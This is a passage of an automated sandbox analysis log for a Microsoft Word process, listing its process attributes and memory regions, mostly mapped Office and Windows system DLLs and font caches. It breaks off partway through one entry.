# Flog Txt Version 1 # Analyzer Version: 2024.2.1 # Analyzer Build Date: Mar 23 2024 12:02:19 # Log Creation Date: 15.05.2024 16:27:55.184 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\office16\\winword.exe" page_root = "0x2423c000" os_pid = "0x13ac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x678" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ebd3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 257 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 258 start_va = 0x5f80000000 end_va = 0x5f800fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005f80000000" filename = "" Region: id = 259 start_va = 0x5f80100000 end_va = 0x5f801fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005f80100000" filename = "" Region: id = 260 start_va = 0x5f80200000 end_va = 0x5f802fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005f80200000" filename = "" Region: id = 261 start_va = 0x5f80300000 end_va = 0x5f803fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005f80300000" filename = "" Region: id = 262 start_va = 0x5f80400000 end_va = 0x5f804fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005f80400000" filename = "" Region: id = 263 start_va = 0x5f80500000 end_va = 0x5f805fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005f80500000" filename = "" Region: id = 264 start_va = 0x5fff270000 end_va = 0x5fff36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005fff270000" filename = "" Region: id = 265 start_va = 0x5fff400000 end_va = 0x5fff5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005fff400000" filename = "" Region: id = 266 start_va = 0x5fff600000 end_va = 0x5fff6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005fff600000" filename = "" Region: id = 267 start_va = 0x5fff800000 end_va = 0x5fff8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005fff800000" filename = "" Region: id = 268 start_va = 0x5fff900000 end_va = 0x5fff9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005fff900000" filename = "" Region: id = 269 start_va = 0x5fffa00000 end_va = 0x5fffafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005fffa00000" filename = "" Region: id = 270 start_va = 0x5fffb00000 end_va = 0x5fffbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005fffb00000" filename = "" Region: id = 271 start_va = 0x5fffc00000 end_va = 0x5fffcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005fffc00000" filename = "" Region: id = 272 start_va = 0x5fffd00000 end_va = 0x5fffdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005fffd00000" filename = "" Region: id = 273 start_va = 0x5fffe00000 end_va = 0x5fffefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005fffe00000" filename = "" Region: id = 274 start_va = 0x1fe0ab40000 end_va = 0x1fe0ab4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0ab40000" filename = "" Region: id = 275 start_va = 0x1fe0ab50000 end_va = 0x1fe0ab56fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0ab50000" filename = "" Region: id = 276 start_va = 0x1fe0ab60000 end_va = 0x1fe0ab74fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0ab60000" filename = "" Region: id = 277 start_va = 0x1fe0ab80000 end_va = 0x1fe0ab83fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0ab80000" filename = "" Region: id = 278 start_va = 0x1fe0ab90000 end_va = 0x1fe0ab93fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0ab90000" filename = "" Region: id = 279 start_va = 0x1fe0aba0000 end_va = 0x1fe0aba1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0aba0000" filename = "" Region: id = 280 start_va = 0x1fe0abb0000 end_va = 0x1fe0acaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0abb0000" filename = "" Region: id = 281 start_va = 0x1fe0acb0000 end_va = 0x1fe0ad6dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 282 start_va = 0x1fe0ad70000 end_va = 0x1fe0ad76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0ad70000" filename = "" Region: id = 283 start_va = 0x1fe0ad80000 end_va = 0x1fe0ad80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0ad80000" filename = "" Region: id = 284 start_va = 0x1fe0ad90000 end_va = 0x1fe0ad90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0ad90000" filename = "" Region: id = 285 start_va = 0x1fe0ada0000 end_va = 0x1fe0ada1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0ada0000" filename = "" Region: id = 286 start_va = 0x1fe0adb0000 end_va = 0x1fe0adbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0adb0000" filename = "" Region: id = 287 start_va = 0x1fe0adc0000 end_va = 0x1fe0adc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0adc0000" filename = "" Region: id = 288 start_va = 0x1fe0add0000 end_va = 0x1fe0af57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0add0000" filename = "" Region: id = 289 start_va = 0x1fe0af60000 end_va = 0x1fe0b0e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0af60000" filename = "" Region: id = 290 start_va = 0x1fe0b0f0000 end_va = 0x1fe0c4effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0b0f0000" filename = "" Region: id = 291 start_va = 0x1fe0c4f0000 end_va = 0x1fe0c4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0c4f0000" filename = "" Region: id = 292 start_va = 0x1fe0c500000 end_va = 0x1fe0c500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0c500000" filename = "" Region: id = 293 start_va = 0x1fe0c510000 end_va = 0x1fe0c511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0c510000" filename = "" Region: id = 294 start_va = 0x1fe0c520000 end_va = 0x1fe0c52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0c520000" filename = "" Region: id = 295 start_va = 0x1fe0c530000 end_va = 0x1fe0c531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0c530000" filename = "" Region: id = 296 start_va = 0x1fe0c540000 end_va = 0x1fe0c541fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0c540000" filename = "" Region: id = 297 start_va = 0x1fe0c550000 end_va = 0x1fe0c551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0c550000" filename = "" Region: id = 298 start_va = 0x1fe0c560000 end_va = 0x1fe0c561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0c560000" filename = "" Region: id = 299 start_va = 0x1fe0c570000 end_va = 0x1fe0c571fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0c570000" filename = "" Region: id = 300 start_va = 0x1fe0c580000 end_va = 0x1fe0c584fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 301 start_va = 0x1fe0c590000 end_va = 0x1fe0c591fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0c590000" filename = "" Region: id = 302 start_va = 0x1fe0c5a0000 end_va = 0x1fe0c65bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\1033\\wwintl.dll") Region: id = 303 start_va = 0x1fe0c660000 end_va = 0x1fe0c66ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 304 start_va = 0x1fe0c670000 end_va = 0x1fe0c67efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 305 start_va = 0x1fe0c680000 end_va = 0x1fe0c680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0c680000" filename = "" Region: id = 306 start_va = 0x1fe0c690000 end_va = 0x1fe0c6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0c690000" filename = "" Region: id = 307 start_va = 0x1fe0c6b0000 end_va = 0x1fe0c868fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 308 start_va = 0x1fe0c870000 end_va = 0x1fe0c9eafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 309 start_va = 0x1fe0c9f0000 end_va = 0x1fe0c9f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0c9f0000" filename = "" Region: id = 310 start_va = 0x1fe0ca50000 end_va = 0x1fe0ca50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0ca50000" filename = "" Region: id = 311 start_va = 0x1fe0ca60000 end_va = 0x1fe0ca6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0ca60000" filename = "" Region: id = 312 start_va = 0x1fe0ca70000 end_va = 0x1fe0cd77fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 313 start_va = 0x1fe0cd80000 end_va = 0x1fe0d6a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 314 start_va = 0x1fe0d6b0000 end_va = 0x1fe124eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 315 start_va = 0x1fe12600000 end_va = 0x1fe12936fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 316 start_va = 0x1fe12940000 end_va = 0x1fe12a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe12940000" filename = "" Region: id = 317 start_va = 0x1fe12a40000 end_va = 0x1fe12a6dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe12a40000" filename = "" Region: id = 318 start_va = 0x1fe12a70000 end_va = 0x1fe12a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe12a70000" filename = "" Region: id = 319 start_va = 0x1fe12a80000 end_va = 0x1fe12a80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe12a80000" filename = "" Region: id = 320 start_va = 0x1fe12a90000 end_va = 0x1fe12a90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe12a90000" filename = "" Region: id = 321 start_va = 0x1fe12aa0000 end_va = 0x1fe12aa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe12aa0000" filename = "" Region: id = 322 start_va = 0x1fe12ab0000 end_va = 0x1fe12af8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 323 start_va = 0x1fe12b00000 end_va = 0x1fe12bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe12b00000" filename = "" Region: id = 324 start_va = 0x1fe12c00000 end_va = 0x1fe12cbbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe12c00000" filename = "" Region: id = 325 start_va = 0x1fe12cc0000 end_va = 0x1fe12cc3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe12cc0000" filename = "" Region: id = 326 start_va = 0x1fe12cd0000 end_va = 0x1fe134cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 327 start_va = 0x1fe134d0000 end_va = 0x1fe138cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe134d0000" filename = "" Region: id = 328 start_va = 0x1fe138d0000 end_va = 0x1fe13dc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe138d0000" filename = "" Region: id = 329 start_va = 0x1fe13dd0000 end_va = 0x1fe13dd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe13dd0000" filename = "" Region: id = 330 start_va = 0x1fe13de0000 end_va = 0x1fe13de0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe13de0000" filename = "" Region: id = 331 start_va = 0x1fe13df0000 end_va = 0x1fe13df0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe13df0000" filename = "" Region: id = 332 start_va = 0x1fe13e00000 end_va = 0x1fe13e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe13e00000" filename = "" Region: id = 333 start_va = 0x1fe13e10000 end_va = 0x1fe13e16fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe13e10000" filename = "" Region: id = 334 start_va = 0x1fe13e20000 end_va = 0x1fe13e24fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe13e20000" filename = "" Region: id = 335 start_va = 0x1fe13e30000 end_va = 0x1fe13e30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe13e30000" filename = "" Region: id = 336 start_va = 0x1fe13e40000 end_va = 0x1fe13e40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe13e40000" filename = "" Region: id = 337 start_va = 0x1fe13e50000 end_va = 0x1fe13e54fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 338 start_va = 0x1fe13e60000 end_va = 0x1fe13e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe13e60000" filename = "" Region: id = 339 start_va = 0x1fe13e70000 end_va = 0x1fe13e70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 340 start_va = 0x1fe13e80000 end_va = 0x1fe13e94fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001b.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db") Region: id = 341 start_va = 0x1fe13ea0000 end_va = 0x1fe13ea0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe13ea0000" filename = "" Region: id = 342 start_va = 0x1fe13eb0000 end_va = 0x1fe13eb6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe13eb0000" filename = "" Region: id = 343 start_va = 0x1fe13ec0000 end_va = 0x1fe13ec1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe13ec0000" filename = "" Region: id = 344 start_va = 0x1fe13ed0000 end_va = 0x1fe13f11fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\System32\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\d2d1.dll.mui") Region: id = 345 start_va = 0x1fe13f20000 end_va = 0x1fe13f21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe13f20000" filename = "" Region: id = 346 start_va = 0x1fe13f40000 end_va = 0x1fe13f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe13f40000" filename = "" Region: id = 347 start_va = 0x1fe13f50000 end_va = 0x1fe1414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe13f50000" filename = "" Region: id = 348 start_va = 0x1fe14290000 end_va = 0x1fe1429ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14290000" filename = "" Region: id = 349 start_va = 0x1fe142a0000 end_va = 0x1fe142affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe142a0000" filename = "" Region: id = 350 start_va = 0x1fe142b0000 end_va = 0x1fe142bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe142b0000" filename = "" Region: id = 351 start_va = 0x1fe142c0000 end_va = 0x1fe142cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe142c0000" filename = "" Region: id = 352 start_va = 0x1fe142d0000 end_va = 0x1fe14acffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe142d0000" filename = "" Region: id = 353 start_va = 0x1fe14ad0000 end_va = 0x1fe14bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14ad0000" filename = "" Region: id = 354 start_va = 0x1fe14bd0000 end_va = 0x1fe14fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14bd0000" filename = "" Region: id = 355 start_va = 0x1fe14fd0000 end_va = 0x1fe150affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 356 start_va = 0x1fe150b0000 end_va = 0x1fe1512ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe150b0000" filename = "" Region: id = 357 start_va = 0x1fe15130000 end_va = 0x1fe15130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe15130000" filename = "" Region: id = 358 start_va = 0x1fe15140000 end_va = 0x1fe1514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe15140000" filename = "" Region: id = 359 start_va = 0x1fe15150000 end_va = 0x1fe1524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe15150000" filename = "" Region: id = 360 start_va = 0x1fe15250000 end_va = 0x1fe1624ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 361 start_va = 0x1fe16250000 end_va = 0x1fe1632efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 362 start_va = 0x1fe16330000 end_va = 0x1fe16405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe16330000" filename = "" Region: id = 363 start_va = 0x1fe16410000 end_va = 0x1fe164e5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe16410000" filename = "" Region: id = 364 start_va = 0x1fe164f0000 end_va = 0x1fe1650efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe164f0000" filename = "" Region: id = 365 start_va = 0x1fe16510000 end_va = 0x1fe1652efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe16510000" filename = "" Region: id = 366 start_va = 0x1fe16810000 end_va = 0x1fe16c15fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16810000" filename = "" Region: id = 367 start_va = 0x1fe16c20000 end_va = 0x1fe17025fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16c20000" filename = "" Region: id = 368 start_va = 0x1fe17030000 end_va = 0x1fe17434fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe17030000" filename = "" Region: id = 369 start_va = 0x1fe17440000 end_va = 0x1fe17450fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 370 start_va = 0x1fe17460000 end_va = 0x1fe1849ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 371 start_va = 0x1fe184c0000 end_va = 0x1fe186bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe184c0000" filename = "" Region: id = 372 start_va = 0x1fe186c0000 end_va = 0x1fe18ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe186c0000" filename = "" Region: id = 373 start_va = 0x1fe18ec0000 end_va = 0x1fe1939dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe18ec0000" filename = "" Region: id = 374 start_va = 0x7ff745d70000 end_va = 0x7ff745d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff745d70000" filename = "" Region: id = 375 start_va = 0x7ff745d80000 end_va = 0x7ff745e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff745d80000" filename = "" Region: id = 376 start_va = 0x7ff745e80000 end_va = 0x7ff745ea2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff745e80000" filename = "" Region: id = 377 start_va = 0x7ff746520000 end_va = 0x7ff7466f9fff monitored = 0 entry_point = 0x7ff746521530 region_type = mapped_file name = "winword.exe" filename = "\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\winword.exe") Region: id = 378 start_va = 0x7fffaff90000 end_va = 0x7fffaff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fffaff90000" filename = "" Region: id = 379 start_va = 0x7fffcbf80000 end_va = 0x7fffcca78fff monitored = 0 entry_point = 0x7fffcc037a3c region_type = mapped_file name = "chart.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\chart.dll") Region: id = 380 start_va = 0x7fffcca80000 end_va = 0x7fffccca2fff monitored = 0 entry_point = 0x7fffcca82bf0 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 381 start_va = 0x7fffcccb0000 end_va = 0x7fffcce1ffff monitored = 0 entry_point = 0x7fffccde3158 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msptls.dll") Region: id = 382 start_va = 0x7fffcce20000 end_va = 0x7fffce0fbfff monitored = 0 entry_point = 0x7fffcce2caf0 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 383 start_va = 0x7fffce100000 end_va = 0x7fffce8cbfff monitored = 0 entry_point = 0x7fffce195f94 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 384 start_va = 0x7fffce8d0000 end_va = 0x7fffcf1bafff monitored = 0 entry_point = 0x7fffce9d5a48 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 385 start_va = 0x7fffcf1c0000 end_va = 0x7fffcf637fff monitored = 0 entry_point = 0x7fffcf239154 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 386 start_va = 0x7fffcf640000 end_va = 0x7fffcf943fff monitored = 0 entry_point = 0x7fffcf6e6094 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 387 start_va = 0x7fffcf950000 end_va = 0x7fffd0abbfff monitored = 0 entry_point = 0x7fffcf9553f0 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\oart.dll") Region: id = 388 start_va = 0x7fffd0ac0000 end_va = 0x7fffd2e5efff monitored = 0 entry_point = 0x7fffd0ad17e0 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\wwlib.dll") Region: id = 389 start_va = 0x7fffd4010000 end_va = 0x7fffd4071fff monitored = 0 entry_point = 0x7fffd4011a50 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 390 start_va = 0x7fffd4080000 end_va = 0x7fffd40b1fff monitored = 0 entry_point = 0x7fffd40a11c0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 391 start_va = 0x7fffd4590000 end_va = 0x7fffd462cfff monitored = 0 entry_point = 0x7fffd4591010 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 392 start_va = 0x7fffd4630000 end_va = 0x7fffd4697fff monitored = 0 entry_point = 0x7fffd4634970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 393 start_va = 0x7fffd46c0000 end_va = 0x7fffd46d7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 